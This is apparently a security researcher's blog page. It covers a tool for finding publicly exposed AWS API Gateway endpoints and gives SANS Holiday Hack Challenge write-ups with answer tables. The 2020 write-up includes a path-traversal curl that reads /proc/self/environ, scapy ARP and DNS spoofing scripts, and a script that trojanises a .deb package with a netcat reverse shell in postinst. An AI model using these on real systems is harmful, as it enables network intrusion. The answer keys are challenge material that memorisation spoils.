Ashish Gupta


Homepage: http://ashishrocks.net

Ahh-My-API: Discover publicly exposed APIs in AWS

TL;DR

REST API gateways created in AWS get a default endpoint of the form https://{api_id}.execute-api.{region}.amazonaws.com, and if not explicitly secured, they are publicly accessible from the internet by default. I wrote a script that finds such APIs across all regions in all the AWS accounts of an AWS organization and takes a screenshot of each API's web page for evidence. It also generates a CSV file which may be ingested by a SIEM such as Splunk for alerting and remediation.

https://github.com/ashishmgupta/ah-my-api

When executed, the script produces a CSV file in the below format, showing all the API URLs, which ones are publicly accessible, and which security settings are applied to the APIs that are not accessible.

It is important to discover and actually test the endpoints from an external environment, to reduce false positives in detection, because APIs can be secured by various means (described below).

Most common ways to secure AWS Rest APIs

  • API keys, e.g. checking for a specific token value in the pre-defined x-api-key header.
  • Lambda authorizers, e.g. custom Lambda code that checks for specific headers/secrets before allowing access.
  • Resource policies, e.g. allowing access from certain IP addresses and denying others.
  • Authentication/authorization from within the backend code (e.g. a Lambda function).
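Because of this, the endpoints have to be probed from outside. A minimal sketch of such a probe (my own illustration; the actual classification logic in ah-my-api may differ):

```python
import urllib.request
import urllib.error

def probe_endpoint(url: str, timeout: float = 5.0) -> str:
    """Classify an API endpoint by its response to an unauthenticated GET."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return f"publicly accessible (HTTP {resp.status})"
    except urllib.error.HTTPError as e:
        # 401/403 usually mean an API key, Lambda authorizer, or resource policy is in place
        if e.code in (401, 403):
            return f"secured (HTTP {e.code})"
        return f"reachable but erroring (HTTP {e.code})"
    except urllib.error.URLError:
        return "unreachable"
```

A row of the CSV can then pair each default endpoint URL with the classification this function returns.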

How to use the script


We follow two steps:

  • Set up an IAM user with appropriate permissions in the management account to assume a given role in the other accounts.
  • Set up the role to assume in all the workload accounts using CloudFormation and StackSets.

The script makes use of an access key on the IAM user “boto3user” in the management account.
boto3user has permission to assume the role in the workload accounts and obtain temporary credentials to access the API gateways there. Diagram below:

In my AWS organization, I have 3 AWS accounts, of which “Account 1” is the management account.

Setting up the IAM user and permissions in the management account

Create an IAM user named boto3user.

Create an access key and secret for the IAM user.

Create a policy with the JSON below and associate it with the IAM user.

ScanAWSAPIPolicy

This allows the user to assume the role named ReadOnlyAPIGatewayAssumeRole in all the AWS accounts in the AWS organization.
Since the script also iterates through the AWS organization, we grant the ListAccounts and DescribeAccount permissions as well.

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "organizations:ListAccounts",
                "organizations:DescribeAccount"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Resource": "arn:aws:iam::*:role/ReadOnlyAPIGatewayAssumeRole"
        }
    ]
}

Create the role to assume in the other accounts

We will use a CloudFormation template to create the role and a StackSet to deploy the template across all the AWS accounts in the AWS organization.

  1. Download the CloudFormation template from here and save it locally:
    https://github.com/ashishmgupta/ah-my-api/blob/main/CloudFormation_Template_For_Role_and_Policy.yaml
  2. On the management account, navigate to CloudFormation > StackSets > Create StackSet.
  3. In the “Specify template” section, choose “Upload a template file” and browse to select the previously saved CloudFormation template.
  4. Specify a name for the StackSet and an optional description.
  5. In the deployment options screen, set the deployment target to “Deploy to Organization” and specify US East as the region.
  6. In the review screen, acknowledge and submit.

The StackSet has been deployed successfully.

Verify the role has been created across all the accounts

We can see the role “ReadOnlyAPIGatewayAssumeRole” has been created in the AWS accounts.
The “Trusted entities” entry is the AWS account number of the management account, which is trusted to assume the “ReadOnlyAPIGatewayAssumeRole” role.

If we look at the role, we see the policy named “ReadOnlyAPIGatewayPolicy” attached to it, with GET/HEAD operations on apigateway, just as we specified in the CloudFormation template.

When we look at the “Trusted entities”, we notice the IAM user named “boto3user” in the management account.
This means it is this user that has permission to assume the “ReadOnlyAPIGatewayAssumeRole” role in all the AWS accounts and call the API Gateway GET/HEAD operations.
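Based on that trust relationship, the role's trust policy would look roughly like the sketch below (111111111111 is a placeholder for the management account id; the actual definition is in the CloudFormation template linked earlier):

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::111111111111:user/boto3user"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
```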

Running the script

Set up the AWS credentials

aws configure

Clone the git repo

git clone https://github.com/ashishmgupta/ah-my-api.git

Install all the requirements

pip install -r requirements.txt

Run the script

python .\ah-my-api.py


Received “Super Honorable mention” in Holiday Hack Challenge 2022 !!!

What an honor to be on the list of “Super Honorable Mentions” for my report submission to the SANS Institute Holiday Hack Challenge 2022, out of 16K participants! Second time in 2 years. Thank you Counter Hack, Ed Skoudis, Chris Elgee, Jared Folkins, Eric Pursley, Evan Booth for the terrific experience and learning, as always. #kringlecon #holidayhackchallenge


SANS Holiday Hack Challenge 2022 (KringleCon 5) Write-up

This is my 4th year of submission to the SANS Holiday Hack Challenge. I had fun and learnt a lot, just like in previous years.

Here is my writeup for this year. Hope you enjoy it.

https://ashishmgupta.github.io/blog/docs/SANS-HHC-2022/site/


Microsoft 365 Security Implementation

Below are concrete steps we can take to secure a Microsoft O365 tenant.

Microsoft O365 Security Implementation (ashishmgupta.github.io)

(This will be a living document and will be updated as new features are published)


SANS Holiday Hack Challenge 2021 (KringleCon 4) Write-up

Holiday Hack Challenge is a CTF challenge organized by SANS and Counter Hack during Christmas each year. This year the CTF was named “KringleCon 4: Jack’s back”.
It had a total of 13 objectives, and completing them would reveal the narrative and win the CTF.

These objectives tested skills in various significant areas of penetration testing, namely Active Directory attacks, cryptographic attacks, SQL injection, Server-Side Request Forgery, and network packet analysis to name a few, plus something very new: FPGA programming!
As you progressed, the difficulty level of the objectives increased.
It was a mind-numbing and awesome experience to complete all those objectives.
Below is the write-up of those objectives including the answers.

https://ashishmgupta.github.io/blog/site/SANS%20Holiday%20Hack%20Challenge%202021/


SANS Holiday Hack Challenge 2020 (KringleCon 3) Write-up

Holiday Hack Challenge is a CTF challenge organized by SANS and Counter Hack during Christmas each year. This year the CTF was named “KringleCon 3: French Hens”. It had a total of 12 objectives and 12 terminals.
Those 12 objectives tested hacking skillsets using Python, JavaScript, network security, cryptography, etc.
As you progressed, the difficulty level of the objectives increased.
It was a mind-numbing and awesome experience to complete all those objectives.
Below is the write-up of those objectives including the answers.

Answers :

Objective | Answer
Objective 1: Uncover Santa’s Gift List | Proxmark
Objective 2: Investigate the S3 bucket | North Pole: The Frostiest Place on Earth
Objective 3: Point-of-sale Password Recovery | santapass
Objective 4: Operate the Santavator | No answer. Solved using JavaScript by manipulating the positions of objects.
Objective 5: Open HID Lock | No answer. Solved using the Proxmark CLI.
Objective 6: Splunk Challenge, Training Question 1 | 13
Objective 6: Splunk Challenge, Training Question 2 | t1059.003-main t1059.003-win
Objective 6: Splunk Challenge, Training Question 3 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
Objective 6: Splunk Challenge, Training Question 4 | 2020-11-30T17:44:15Z
Objective 6: Splunk Challenge, Training Question 5 | 3648
Objective 6: Splunk Challenge, Training Question 6 | quser
Objective 6: Splunk Challenge, Training Question 7 | 55FCEEBB21270D9249E86F4B9DC7AA60
Objective 6: Splunk Challenge, the challenge question | The Lollipop Guild
CAN Bus Problem (prerequisite for Objective 7: Solve the Sleigh’s CAN-D-BUS Problem) | 122520
Objective 8: Broken Tag Generator | JackFrostWasHere
Objective 9: ARP Shenanigans | Tanta Kringle
Objective 10: Defeat Fingerprint Sensor | No answer. Bypassed the “Santa” check using JavaScript and Fiddler.
Objective 11a: Naughty/Nice List with Blockchain Investigation Part 1 | 57066318F32F729D
Objective 11b: Naughty/Nice List with Blockchain Investigation Part 2 | fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

Objective 1 : Uncover Santa’s Gift List

There is a photo of Santa’s Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.

Answer : Proxmark

Process :

1) Downloaded the photograph.
2) Cropped the photo to only the gift list.
3) Installed GIMP.
4) Used Filters > Distorts > Whirl and Pinch.
5) Unswirled the image to find the answer.

Original billboard image :

Unswirled image revealing the item:

Objective 2: Investigate the S3 bucket

When you unwrap the over-wrapped file, what text string is inside the package? Talk to Shinny Upatree in front of the castle for hints on this challenge.

Answer :
North Pole: The Frostiest Place on Earth

Process :

Using bucket_finder.rb, the S3 bucket “wrapper3000” was downloaded and extracted.
The folder has a file named ‘package’ which contains a base64-encoded string.
Below is the process of unwrapping the ‘package’ file all the way down to the text file:
wrapper3000/package > base64 decode > zip file > .bz2 file > .tar file > .xxd file > .xz file > .z file > ASCII text file.

#!/bin/bash -x
# Author : Ashish Gupta
# Below will download the s3 bucket and keep unwrapping till we find a text file
# The downloaded and extracted folder "wrapper3000" has a file named 'package' which contains a base64 encoded string
# Unwrapping process :
# wrapper3000/package > base64 decode > zip file > .bz2 file > .tar file > .xxd file > .xz file > .z file > ASCII text file

#
# Assuming we are on home, this will show the items TIPS  bucket_finder
ls
# Go to bucket_finder
cd bucket_finder/
# Check what is currently in the wordlist
cat wordlist
# Append wrapper3000 to the wordlist
echo wrapper3000 >> wordlist
# Check to make sure wrapper3000 is appended to the wordlist
cat wordlist
# Search for s3 buckets with names noted in the 'wordlist' file and if found download them
# Below will download the file named 'package' 
./bucket_finder.rb wordlist -d
# change to downloaded wrapper3000/ directory
cd wrapper3000
# Check to make sure a file named 'package' exists
ls
# What kind of file is 'package'
# Below will show "package: ASCII text, with very long lines"
file package
# Looks like base64. Decode it to a file named 'myfile'
cat package | base64 -d > myfile
# What kind of file is myfile
# Below will show "myfile: Zip archive data, at least v1.0 to extract"
# So, myfile is a zip. extract using unzip.
# Below will extract to a .bz2 file printing the below
#Archive:  myfile
# extracting: package.txt.Z.xz.xxd.tar.bz2 
unzip myfile
# What kind of file is "package.txt.Z.xz.xxd.tar.bz2" 
# Below will show a bz2 file named "package.txt.Z.xz.xxd.tar.bz2" printing the below :
# package.txt.Z.xz.xxd.tar.bz2: bzip2 compressed data, block size = 900k
file package.txt.Z.xz.xxd.tar.bz2 
# It's a bz2 file, extract using bzip2
# Below will extract the bz2 file to another file named "package.txt.Z.xz.xxd.tar"
bzip2 -d package.txt.Z.xz.xxd.tar.bz2
# We have now package.txt.Z.xz.xxd.tar
# What kind of file is "package.txt.Z.xz.xxd.tar"
# below will show .tar printing below :
# package.txt.Z.xz.xxd.tar: POSIX tar archive
file package.txt.Z.xz.xxd.tar 
# Extract the tar file. It will extract to package.txt.Z.xz.xxd
tar -xvf package.txt.Z.xz.xxd.tar
# What kind of file is "package.txt.Z.xz.xxd"
# package.txt.Z.xz.xxd: ASCII text
file package.txt.Z.xz.xxd
# use xxd on this to extract to test2.xz
xxd -r package.txt.Z.xz.xxd test2.xz
# What kind of file is "test2.xz"
# test2.xz: XZ compressed data
file test2.xz
# uncompress test2.xz using xz which will extract the file named "test2"
unxz test2.xz
# rename file test2 to test2.z
mv test2 test2.z
# uncompress test2.z. this will create a file named "test2"
uncompress test2.z
# What kind of file is "test2"
# test2: ASCII text
file test2
# Print the contents of this text file
# Output would show "North Pole: The Frostiest Place on Earth"
cat test2

Objective 3: Point-of-sale Password Recovery

Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What’s the password?

Answer : santapass

Process :

Step 1: Extract the santa-shop.exe using 7zip. You see the ASAR file.

Step 2: Extract the source code from ASAR application and find the password in main.js

Objective 4: Operate the Santavator

Talk to Pepper Minstix in the entryway to get some hints about the Santavator.

Process

Use the chrome JS console to rotate the green light and candycane so we can get lights to all the outlets.

a = document.querySelector("body > div.box-parent > div.item.light.greenlight")
a.style.transform = "rotate(-45deg)"
candy = document.querySelector("body > div.box-parent > div.item.item.candycane")
candy.style.transform="rotate(-10deg)"

Objective 5: Open HID Lock

Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.

Copy the badge ID from the elf Bow Ninecandle

Go near Bow Ninecandle on the “Talks” floor.

Open the Proxmark3 CLI from the “Items” menu

Copy the badge value from Bow Ninecandle using the below command :

lf hid read

The tag id is 2006e22f0e

Use the copied tag id to unlock the door in workshop room

Go to the workshop floor and stand in front of the lock.

Open Proxmark CLI and simulate the tag id “2006e22f0e” of Bow Ninecandle

lf hid sim -r 2006e22f0e

The door is unlocked!!!

When you enter the room you just unlocked, it’s all dark with a light at the end.
You approach it……

and you become Santa!!!
This was a magical moment for me!

Objective 6: Splunk Challenge

Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?

Splunk Training question 1

How many distinct MITRE ATT&CK techniques did Alice emulate?

Answer : 13

Process :

Execute the below Splunk query :

| tstats count where index=t* by index 
| eval results=split(index,"-")  
| eval without-dash=mvindex(results,0)
| table without-dash
| rex field=without-dash mode=sed "s/\..*$//" 
| dedup without-dash

OR

| tstats count where index=* by index 
| search index=T*-win OR T*-main
| rex field=index "(?<technique>t\d+)[\.\-].0*" 
| stats dc(technique)

Splunk Training Question 2 :

What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

Answer : t1059.003-main t1059.003-win

Process :

Execute the below Splunk query:

index=t1059.003*
| table index
| dedup index
| sort index 

Output :

Splunk Training Question 3 :

One technique that Santa had us simulate deals with ‘system information discovery’. What is the full name of the registry key that is queried to determine the MachineGuid?

Answer: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

Process :

“System Information Discovery” is technique T1082
https://attack.mitre.org/techniques/T1082/

Note that, per the question, a registry key was queried. So execute the below Splunk query across all the indexes for technique t1082, searching for “reg” to get the registry key that was queried. Since the “MachineGuid” needed to be determined, it must have been part of the query, so that is included in the Splunk query as well:

index=t1082* reg machineguid  CommandLine!=''
|  table CommandLine

Output :

Splunk Training Question 4

According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)

Answer: 2020-11-30T17:44:15Z

Process :

1) Go to the Atomic test GitHub page
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/Indexes/Indexes-Markdown/index.md

2) Look for “OSTAP”.

3) Execute the below Splunk query on the “attack” index to get the first OSTAP-related test executed.

index=attack OSTAP 
| table "Execution Time _UTC"
| sort "Execution Time _UTC" asc

Splunk Training Question 5

One Atomic Red Team test executed by the Attack Range makes use of an open-source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

Answer : 3648

Process :

1) First look up what projects were authored by frgnca
https://github.com/frgnca

2) Search the attack index for the above projects one by one; you get a hit on “audio”

index=attack audio

We get a hit on this with technique# T1123

3) Confirmed the T1123 does make use of the project “AudioDeviceCmdlets”
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md

4) Now pivot to the index for technique T1123, filtering for “audio” with Sysmon as the source and TimeCreated as the time field. Note that “tail 1” is used because the ask is the process id associated with the “first use”; since Splunk returns search results with the latest first, “tail 1” yields the first (earliest) record.

index=t1123* EventCode=1 *audio*  source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" 
| tail 1
| table  TimeCreated, process_id, CommandLine, *

Splunk Training Question 6

Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

Answer : quser

Process :

1) Let’s find which technique uses the Windows registry run keys.
Go to https://mitre-attack.github.io/attack-navigator/v3/enterprise/
and search for “run”, then “view” the 1st result.

It’s technique T1547.001,
Windows registry run keys:
https://attack.mitre.org/techniques/T1547/001/

2) Search index t1547 for the sysmon logs for technique with bat

index=t1547* "*bat*" source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" CommandLine!=''
| table CommandLine

There are two bat files: batstartup.bat (stored locally) and Discovery.bat (on GitHub).

The batch file location appears very small in the above screenshot so listing them out below:
1) $env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat\
2) https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

The Sysmon logs won’t contain the source code of batstartup.bat.
But look at the second one. It’s on GitHub:
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat

Just go to that URL; the last line of that batch file is “quser”.

Splunk Training Question 7 :

According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

Answer : 55FCEEBB21270D9249E86F4B9DC7AA60

Process :

Looking at ALL the technique indices (index=t* ) with source as the zeek x509 logs specifically win-dc:

index=t* *cert* source="/opt/zeek/logs/current/x509.log" certificate.subject=*win-dc*
|  table certificate.serial, certificate.subject
|  dedup certificate.serial, certificate.subject

The Splunk challenge question :

What is the name of the adversary group that Santa feared would attack KringleCon?

Answer : The Lollipop Guild

Process :

Gather all the hints!
Alice gave a few hints:

Hint 1:
Alice says the “ciphertext is 7FXjP1lyfKbyDK/MChyf36h7”
Hint 2:
Alice says “We don’t care about RFC 7465”
RFC 7465 requires that TLS clients and servers never negotiate the use of RC4 ciphers when they establish connections.
https://tools.ietf.org/html/rfc7465
So, if they don’t care about RFC 7465, they ignore the rule that RC4 should not be used and still use RC4 ciphers.
This means the encryption method used was RC4.
But encryption needs a key. What that key would be?

Hint 3

Alice says the last one is encrypted using “your favorite phrase”
Santa asks “my favorite phrase?”
Alice says “I can’t believe the Splunk folks put it in their talk”

now, we go and watch the below talk which is in Kringlecon 2020:
Dave Herrald, Adversary Emulation and Automation | KringleCon 2020
Mr. Dave Herrald has the below in the video:

and he says, this is the most important slide you want to take note of if you are preparing for the Splunk challenge within holiday hack challenge 2020:

Stay Frosty
(That might be our encryption key)

Find answer using all the hints:

So far, we have the below hints:
a) We have the base64 text 7FXjP1lyfKbyDK/MChyf36h7
b) We know RC4 could potentially be the encryption method
c) We know “Stay Frosty” could potentially be the encryption key used with RC4

Now we use all the hints to find the adversary: The Lollipop Guild.
Open Cyberchef
https://gchq.github.io/CyberChef/

Build the recipe:
1st item:
“From Base64”
input: 7FXjP1lyfKbyDK/MChyf36h7

2nd Item:
“Encryption /Encoding” > RC4
Passphrase: Stay Frosty

Answer: The Lollipop Guild
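The same decode can be reproduced outside CyberChef. A small pure-Python RC4 sketch (standard textbook RC4, written by me for illustration):

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA): XOR keystream with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ciphertext = base64.b64decode("7FXjP1lyfKbyDK/MChyf36h7")
print(rc4(b"Stay Frosty", ciphertext).decode())  # -> The Lollipop Guild
```

RC4 is symmetric, so the same function both encrypts and decrypts.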

CAN Bus Problem

Answer : 122520

Process :

When you open the UI, you will see many messages.
Filter out the noise, the messages with all 0’s, on the sleigh’s CAN-D bus.
When you click unlock, there is one message which consistently comes up:
19B#00000F000000

Filter out the other one, 19B#0000000F2057.
Now we consistently have 19B#00000F000000 when we click unlock.

Criteria added to filter noise and message for unlock found

Now, in the CAN-Bus Investigation terminal, grep for “19B#00000F000000” in candump.log and you see the entry 1608926671.122520.
The challenge needed the decimal portion of the timestamp, hence the answer is 122520.
Please see the below screenshot.

Find the CAN message in candump.log; the decimal portion of the timestamp is the answer.
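The grep-and-extract step can also be scripted; a minimal sketch, assuming the usual candump log line format of `(seconds.microseconds) interface id#data`:

```python
def find_can_timestamp(log_lines, message="19B#00000F000000"):
    """Return the decimal (microsecond) part of the timestamp for the first matching CAN message."""
    for line in log_lines:
        if message in line:
            # line looks like: "(1608926671.122520) vcan0 19B#00000F000000"
            stamp = line.split(")")[0].lstrip("(")
            return stamp.split(".")[1]
    return None

sample = ["(1608926671.122520) vcan0 19B#00000F000000"]
print(find_can_timestamp(sample))  # -> 122520
```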

Objective 7: Solve the Sleigh’s CAN-D-BUS Problem

Jack Frost is somehow inserting malicious messages onto the sleigh’s CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.

Process :

Wunorse Openslae says there is an issue with breaks and doors :

Hints from Wunrose Openslae

CAN ID of doors is 19B
CAN ID of breaks is 080

“Breaks” fix – Exclude all the messages containing FF (larger numbers, greater than decimal 100)
“Doors” fix – Exclude the malicious messages 0F2057

Objective 8: Broken Tag Generator

Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.

Answer : JackFrostWasHere

High level Approach:

Exploit the directory traversal vulnerability in the Tag Generator application to achieve Local File Inclusion (LFI) on the web server running the application, and then access /proc/self/environ, which contains all the environment variables used by the web server process, including the variable named “GREETZ”.

Process :

Check if the web app has directory traversal vulnerability

The elf Holly Evergreen thinks there may be an issue with the “file upload” feature :

Hints from Holly Evergreen

When you upload an image in the tag generator, the image is stored with below URL.
https://tag-generator.kringlecastle.com/image?id=<guid>.png

Chrome network tab showing the URL when image is uploaded:
https://tag-generator.kringlecastle.com/image?id=<guid>.png

When you upload a non-image file, it gives the below error.
From the error, we understand the following:

  1. It’s a Ruby on Rails app
  2. app.rb resides in /app/lib
  3. app.rb stores the user-uploaded files in /tmp

Error when you upload a non-image file

Assuming whatever is uploaded to /tmp is being served without any validation, we can try directory traversal to get the code of app.rb:

curl https://tag-generator.kringlecastle.com/image?id=../app/lib/app.rb

../app/lib/app.rb means: from the current directory /tmp, go one level up (to the root), then into app, then lib, and then get app.rb.

Now we have the source code of the app.rb :

Use Local File Inclusion (LFI) to access the environment variables of the process

So, we know this Ruby application has the directory traversal vulnerability
curl https://tag-generator.kringlecastle.com/image?id=../app/lib/app.rb

Under Linux, /proc/self is a dynamic symlink provided by the kernel that points to the process opening it.
E.g., if process 1234 follows /proc/self, it will see the same content as /proc/1234,
and /proc/self/environ will have all the environment variables for the process.

curl https://tag-generator.kringlecastle.com/image?id=../proc/self/environ | tr '\0' '\n'

This will list all the environment variables, including “GREETZ”, whose value is “JackFrostWasHere”.
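The raw bytes returned from /proc/self/environ are NUL-separated KEY=VALUE pairs; a small helper (my own sketch, not part of the challenge) to turn them into a dict:

```python
def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated KEY=VALUE blob returned by /proc/self/environ."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            key, _, value = entry.partition(b"=")
            env[key.decode()] = value.decode()
    return env

sample = b"PATH=/usr/local/bin:/usr/bin\0GREETZ=JackFrostWasHere\0"
print(parse_environ(sample)["GREETZ"])  # -> JackFrostWasHere
```

This does in Python what the `tr '\0' '\n'` in the curl pipeline does in shell.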

Objective 9: ARP Shenanigans

Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Answer : Tanta Kringle

High level approach :

  1. Change the ARP cache of target machine (10.6.6.35) so all requests come to our host (ARP Poisoning) and we respond to DNS requests (DNS poisoning).
  2. Build a Linux trojan on a deb file (which 10.6.6.35 is constantly requesting). This Linux trojan when executed on 10.6.6.35 will open a reverse shell of 10.6.6.35 on our host.
  3. With shell access on 10.6.6.35, we get access to the file /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt, which will have the name of the person who recused herself from the vote described in the document.

Below screenshot shows how we determined the machines.

Nslookup provides more information on those 3 hosts.

The Process :

ARP Poisoning:

Spoof the ARP response going to 10.6.6.35 with our MAC address so all requests (including DNS requests) from 10.6.6.35 come to our host (ARP poisoning). Change scripts/arp_resp.py accordingly.

DNS Poisoning :

Since we can intercept all the DNS requests coming from 10.6.6.35, we can answer those DNS requests ourselves (DNS poisoning). Change scripts/dns_resp.py accordingly.

Create a Linux trojan with netcat reverse shell payload for port 4444 in it

10.6.6.35 requests a specific DEB file (pub/jfrost/backdoor/suriv_amd64.deb) over HTTP.
We can create a Linux trojan from any DEB file, renamed to the above name, which includes a netcat reverse shell.
The Linux trojan is placed in the same directory structure as requested by 10.6.6.35 [pub/jfrost/backdoor/suriv_amd64.deb]

Run Python web server and netcat listening on port 4444

Run the python web server on the root.
Run netcat listening on our host on port 4444.

Showing ARP Poisoning

Changes to the script/arp_resp.py :

Changes to scripts/arp_resp.py

DNS Poisoning diagram :


DNS poisoning

Changes to scripts/dns_resp.py

Changes to scripts/dns_resp.py

Creating the linux trojan :

The debs/ folder has a number of deb files. We choose netcat-traditional_1.10-41.1ubuntu1_amd64.deb
Add netcat reverse shell script to this deb file :

nc 10.6.0.3 4444 -e /bin/sh

The above will be executed when the deb file is downloaded and installed on 10.6.6.35. This gives a reverse shell from 10.6.6.35 to our host 10.6.0.3 on port 4444.
Ref : http://www.wannescolman.be/?p=98

Putting it all together :

See the below screenshot the processes executed in the below order – numbered in the below screenshot.

0 : netcat -nlvp 4444
1 : tcpdump -i eth0 -w dump2.pcap
2 : python3 -m http.server 80
3 : python3 scripts/dns_resp.py
4 : python3 scripts/arp_resp.py
5 : We get reverse shell on 10.6.6.35

Once we get the reverse shell from 10.6.6.35, we can get the file NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt and find who recused herself from the vote.

It was Tanta Kringle!

All script files are in the zip file (please remove the .txt from the files after extraction):

arp_resp.py (with changes) for ARP poisoning

                                                                                   
#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid

# Our eth0 ip
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our eth0 mac address
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])

def handle_arp_packets(packet):
    # if arp request, then we need to fill this out to send back our mac as the response
    if ARP in packet and packet[ARP].op == 1:
        ether_resp = Ether(dst=packet[ARP].hwsrc, type=0x806, src=macaddr)

        arp_response = ARP(pdst=packet[Ether].psrc)
        arp_response.op =  'is-at'
        arp_response.plen = 4
        arp_response.hwlen = 6
        arp_response.ptype = 0x800
        arp_response.hwtype = 0x1

        arp_response.hwsrc = macaddr
        arp_response.psrc =  packet[ARP].pdst
        arp_response.hwdst = packet[ARP].hwsrc
        arp_response.pdst = packet[ARP].psrc

        response = ether_resp/arp_response

        sendp(response, iface="eth0")

def main():
    # We only want arp requests
    berkeley_packet_filter = "(arp[6:2] = 1)"
    # sniffing for one packet that will be sent to a function, while storing none
    sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1)

if __name__ == "__main__":
    main()

dns_resp (with changes) for DNS poisoning :

#!/usr/bin/python3
from scapy.all import *
import netifaces as ni
import uuid

# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = "10.6.6.53"

def handle_dns_request(packet):
    # Swap the MAC addresses, IP addresses, and ports from the request to build the response.
    eth = Ether(src=packet.dst, dst=packet.src)   
    ip  = IP(dst=packet[IP].src, src=packet[IP].dst)
    udp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)
    dns = DNS(
        # MISSING DNS RESPONSE LAYER VALUES 
        id=packet[DNS].id,
        qr=1,
        ancount=1,
        aa=1,
        qd=packet[DNS].qd,
        an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=ipaddr)
    )
    dns_response = eth / ip / udp / dns
    sendp(dns_response, iface="eth0")

def main():
    berkeley_packet_filter = " and ".join( [
        "udp dst port 53",                              # dns
        "udp[10] & 0x80 = 0",                           # dns request
        "dst host {}".format(ipaddr_we_arp_spoofed),    # destination ip we had spoofed (not our real ip)
        "ether dst host {}".format(macaddr)             # our macaddress since we spoofed the ip to our mac
    ] )

    # sniff the eth0 int without storing packets in memory and stopping after one dns request
    sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1)

if __name__ == "__main__":
    main()

build_linux_trojan.sh [to create a Linux trojan with a .deb file]

#!/bin/bash
cd ~/
mkdir build-payload
cp debs/netcat-traditional_1.10-41.1ubuntu1_amd64.deb build-payload/
cd build-payload
mkdir work
echo "Extracting netcat-traditional_1.10-41.1ubuntu1_amd64.deb to work/ folder"
dpkg -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb work
mkdir work/DEBIAN
ar -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb 
echo "Extracting the control and postinst files from netcat-traditional_1.10-41.1ubuntu1_amd64.deb"
tar -xf control.tar.xz ./control
tar -xf control.tar.xz ./postinst
echo "Appending 'nc 10.6.0.3 4444 -e /bin/sh' to the postinst file"
echo "nc 10.6.0.3 4444 -e /bin/sh" >> postinst    # that's my IP address, which I want 10.6.6.35 to connect back to for the reverse shell
mv control work/DEBIAN/
mv postinst work/DEBIAN/
cd ~/
echo "building the deb package"
dpkg-deb --build build-payload/work/
cd ~/
mkdir -p pub/jfrost/backdoor
echo "moving the work.deb to pub/jfrost/backdoor/suriv_amd64.deb"
mv build-payload/work.deb pub/jfrost/backdoor/suriv_amd64.deb
echo "pub/jfrost/backdoor/suriv_amd64.deb is ready!"

Objective 10: Defeat Fingerprint Sensor

Bypass the Santavator fingerprint sensor. Enter Santa’s office without Santa’s fingerprint.

High level details :

